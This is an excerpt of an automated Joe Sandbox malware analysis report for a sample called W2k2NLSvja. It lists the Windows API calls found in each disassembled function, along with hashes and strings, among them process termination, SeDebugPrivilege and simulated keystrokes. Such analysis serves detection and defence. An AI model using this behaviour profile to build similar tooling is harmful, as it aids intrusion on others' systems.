                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 560350794-0
                                                                                                                        • Opcode ID: dd01a0ee035ae479c3e96ab9421c9a5a3b3d4a759575ee2e994fa8db6b2dbd4f
                                                                                                                        • Instruction ID: f99b54dff030dadecd0182fa0d5b15a611449c526841b392cadc7d45c270501b
                                                                                                                        • Opcode Fuzzy Hash: dd01a0ee035ae479c3e96ab9421c9a5a3b3d4a759575ee2e994fa8db6b2dbd4f
                                                                                                                        • Instruction Fuzzy Hash: 04F13B71A04109EFDB14DF94C888EBEB7B9FF89314F108099F615AB2A0DB71AE45DB50
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FFF9C9
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFFB5C
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFFB80
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFFBC0
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFFBE2
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FFFD5E
                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FFFD90
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FFFDBF
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FFFE36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4090791747-0
                                                                                                                        • Opcode ID: a62b7a5f832cad78597966995dabfe18a782781163c0a0129fd5e09c074da650
                                                                                                                        • Instruction ID: bceb19a40d197de06341922bd4b2b4a8d7d0e310a91ca98342fa398d85cf8404
                                                                                                                        • Opcode Fuzzy Hash: a62b7a5f832cad78597966995dabfe18a782781163c0a0129fd5e09c074da650
                                                                                                                        • Instruction Fuzzy Hash: E2E1D3316043059FC724EF24C881B7ABBE0AF85364F18846DF9999B2A2CB75DC45EB52
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE38D3,?), ref: 00FE48C7
                                                                                                                          • Part of subcall function 00FE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE38D3,?), ref: 00FE48E0
                                                                                                                          • Part of subcall function 00FE4CD3: GetFileAttributesW.KERNEL32(?,00FE3947), ref: 00FE4CD4
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00FE4FE2
                                                                                                                        • _wcscmp.LIBCMT ref: 00FE4FFC
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00FE5017
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 793581249-0
                                                                                                                        • Opcode ID: 3d938e0bfe0bf89e5d6f8e7489325e76ac7a860c283e1db6c5755b8fe02440a0
                                                                                                                        • Instruction ID: 3055a4fb0fdcc7afa9368c61efd4bd2c0b81199e348a04604c404c4f96174366
                                                                                                                        • Opcode Fuzzy Hash: 3d938e0bfe0bf89e5d6f8e7489325e76ac7a860c283e1db6c5755b8fe02440a0
                                                                                                                        • Instruction Fuzzy Hash: E95193B24087859BC764EB65CC819DFB3ECAF85710F10092EB285C3151EF78E2889766
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0100896E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: b13e965d23a7db490b90417b1f0900d0f52e1a7afde6c9e8841a0086d03e15b5
                                                                                                                        • Instruction ID: de8fa799cef72537be177c382b87f4fd654b8f1167280790b1fd4dbb05d32704
                                                                                                                        • Opcode Fuzzy Hash: b13e965d23a7db490b90417b1f0900d0f52e1a7afde6c9e8841a0086d03e15b5
                                                                                                                        • Instruction Fuzzy Hash: E751A230D00209BBFF739F28DC85B993BA4BB06310F108153F695E65D1DB76A6809B51
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FBC547
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FBC569
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FBC581
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FBC59F
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FBC5C0
                                                                                                                        • DestroyIcon.USER32(00000000), ref: 00FBC5CF
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FBC5EC
                                                                                                                        • DestroyIcon.USER32(?), ref: 00FBC5FB
                                                                                                                          • Part of subcall function 0100A71E: DeleteObject.GDI32(00000000), ref: 0100A757
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2819616528-0
                                                                                                                        • Opcode ID: ae616ea152624912e7524d594438f69184ed805c158132c320d8552a3de59293
                                                                                                                        • Instruction ID: 20924c1a885bac65493790ae9dddcdc383162325600fed34ad7d2e5cb6d76fcd
                                                                                                                        • Opcode Fuzzy Hash: ae616ea152624912e7524d594438f69184ed805c158132c320d8552a3de59293
                                                                                                                        • Instruction Fuzzy Hash: 765168B5A00209AFDB20EF25CC85FEA37A5FB59760F100518F94697290DB75FD81EBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FDAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDAE77
                                                                                                                          • Part of subcall function 00FDAE57: GetCurrentThreadId.KERNEL32 ref: 00FDAE7E
                                                                                                                          • Part of subcall function 00FDAE57: AttachThreadInput.USER32(00000000,?,00FD9B65,?,00000001), ref: 00FDAE85
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9B70
                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FD9B8D
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FD9B90
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9B99
                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FD9BB7
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD9BBA
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9BC3
                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FD9BDA
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD9BDD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2014098862-0
                                                                                                                        • Opcode ID: 0002fc835e0ce0ef0cbb3d0c088d65907ba3c08d6cf2f77b161cb68693eddb3b
                                                                                                                        • Instruction ID: d4469a869e8af9f64a52698cc82146075de6cc15c27c580a621ed6fbb871a42f
                                                                                                                        • Opcode Fuzzy Hash: 0002fc835e0ce0ef0cbb3d0c088d65907ba3c08d6cf2f77b161cb68693eddb3b
                                                                                                                        • Instruction Fuzzy Hash: 1F11E171554618BFF6216B70DC89FAA3B2DEB4C751F110416F284AB190CAF75C10EBA4
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FD8A84,00000B00,?,?), ref: 00FD8E0C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00FD8A84,00000B00,?,?), ref: 00FD8E13
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FD8A84,00000B00,?,?), ref: 00FD8E28
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00FD8A84,00000B00,?,?), ref: 00FD8E30
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00FD8A84,00000B00,?,?), ref: 00FD8E33
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FD8A84,00000B00,?,?), ref: 00FD8E43
                                                                                                                        • GetCurrentProcess.KERNEL32(00FD8A84,00000000,?,00FD8A84,00000B00,?,?), ref: 00FD8E4B
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00FD8A84,00000B00,?,?), ref: 00FD8E4E
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00FD8E74,00000000,00000000,00000000), ref: 00FD8E68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1957940570-0
                                                                                                                        • Opcode ID: 2768727b7e16f585b966a73f44adea6c0b091c18a793271aac7a7d0e1adb1b06
                                                                                                                        • Instruction ID: 771ad281427d503985938594f11de2bc0ef4a5837e8710635dd93ca35f7af36f
                                                                                                                        • Opcode Fuzzy Hash: 2768727b7e16f585b966a73f44adea6c0b091c18a793271aac7a7d0e1adb1b06
                                                                                                                        • Instruction Fuzzy Hash: 5701B6B5240309BFE731EBA5DC4DFAB3BACEB89711F004411FA45DB295CA759800DB20
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                        • Opcode ID: 3895d1e8b1f1546a24fd0828cc15a4f1ed534447b11aaddc37e6d3d6c54ffc16
                                                                                                                        • Instruction ID: 985f8f2a2802c991382e026e4da81a7f50d168268ae0b5d9a5ed511502b1728f
                                                                                                                        • Opcode Fuzzy Hash: 3895d1e8b1f1546a24fd0828cc15a4f1ed534447b11aaddc37e6d3d6c54ffc16
                                                                                                                        • Instruction Fuzzy Hash: 0891CF71E04219ABDF24DFA5C844FAEB7B8EF45720F148559F605EB2A0D7B09901DFA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?,?,00FD799D), ref: 00FD766F
                                                                                                                          • Part of subcall function 00FD7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?), ref: 00FD768A
                                                                                                                          • Part of subcall function 00FD7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?,?), ref: 00FD7698
                                                                                                                          • Part of subcall function 00FD7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD758C,80070057,?), ref: 00FD76A8
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FF9B1B
                                                                                                                        • _memset.LIBCMT ref: 00FF9B28
                                                                                                                        • _memset.LIBCMT ref: 00FF9C6B
                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00FF9C97
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00FF9CA2
                                                                                                                        Strings
                                                                                                                        • NULL Pointer assignment, xrefs: 00FF9CF0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                        • Opcode ID: 9b2601060b29aad98bd61e46232454f6f0f0e0019bcb0688d0f434f1d9cef56c
                                                                                                                        • Instruction ID: 3a6f9e3c33d8a73a8dab88678845bf744c47b0e6b70e25103ec984dac025c77e
                                                                                                                        • Opcode Fuzzy Hash: 9b2601060b29aad98bd61e46232454f6f0f0e0019bcb0688d0f434f1d9cef56c
                                                                                                                        • Instruction Fuzzy Hash: B8915B71D0021DEBDB10EFA4DC84BEEBBB9AF08710F20415AF519A7291DB759A44DFA0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01007093
                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 010070A7
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010070C1
                                                                                                                        • _wcscat.LIBCMT ref: 0100711C
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 01007133
                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01007161
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                        • String ID: SysListView32
                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                        • Opcode ID: 56f33a9f99795a7bef71a82ce137849fd195e39220841417dda67fad447e6920
                                                                                                                        • Instruction ID: 349cc0822d37225e71085e9872bab7c54f1daaeb8fb2e9dceabe85766a56762a
                                                                                                                        • Opcode Fuzzy Hash: 56f33a9f99795a7bef71a82ce137849fd195e39220841417dda67fad447e6920
                                                                                                                        • Instruction Fuzzy Hash: 7B41A475A00309EFEB22DF68CC85BEE77E9EF08350F00056AF5C4971D2D676A9859B50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FE3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00FE3EB6
                                                                                                                          • Part of subcall function 00FE3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00FE3EC4
                                                                                                                          • Part of subcall function 00FE3E91: CloseHandle.KERNEL32(00000000), ref: 00FE3F8E
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFECB8
                                                                                                                        • GetLastError.KERNEL32 ref: 00FFECCB
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FFECFA
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FFED77
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00FFED82
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FFEDB7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                        • Opcode ID: 41d20237b25055e61d48a9b4f1857822352a5e64be5ad42406edf79c7af53121
                                                                                                                        • Instruction ID: 5e1de6736811cdeacbed4bb62e41f75859b01d2cc4a64c1754d3aec403b06645
                                                                                                                        • Opcode Fuzzy Hash: 41d20237b25055e61d48a9b4f1857822352a5e64be5ad42406edf79c7af53121
                                                                                                                        • Instruction Fuzzy Hash: E741C0316042059FDB25EF24CC95F7DB7A5AF80714F088059F9829B3E2DBB9A804EB91
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00FE32C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: 687c744dcd02eb012815cece301531555e2ed4b09ce00876af16699099722788
                                                                                                                        • Instruction ID: 3d35e589db211cd3adfdd0e1c510a13200967e17482fbdce2b4aa83bc5dd802c
                                                                                                                        • Opcode Fuzzy Hash: 687c744dcd02eb012815cece301531555e2ed4b09ce00876af16699099722788
                                                                                                                        • Instruction Fuzzy Hash: 7511EB32B083D6BBD7115A57DC4ED6AB39CDF1A370F10001EFA8097181D7759B4066A5
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FE454E
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00FE4555
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FE456B
                                                                                                                        • LoadStringW.USER32(00000000), ref: 00FE4572
                                                                                                                        • _wprintf.LIBCMT ref: 00FE4598
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FE45B6
                                                                                                                        Strings
                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00FE4593
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                        • Opcode ID: 6b751dc06db6270b5bd0b1d8130a70a19be0592c0232bc98041fb387db6d7c88
                                                                                                                        • Instruction ID: a6a7f4782611ee157732b2beba57939d178277f44a61bc168a0a1a9a23ead846
                                                                                                                        • Opcode Fuzzy Hash: 6b751dc06db6270b5bd0b1d8130a70a19be0592c0232bc98041fb387db6d7c88
                                                                                                                        • Instruction Fuzzy Hash: 720162F2900209BFE731EBA1DD89EE7776CEB08301F000595BB85D2041EA799E859B70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0100D78A
                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0100D7AA
                                                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0100D9E5
                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0100DA03
                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0100DA24
                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0100DA43
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0100DA68
                                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0100DA8B
                                                                                                                        Memory Dump Source
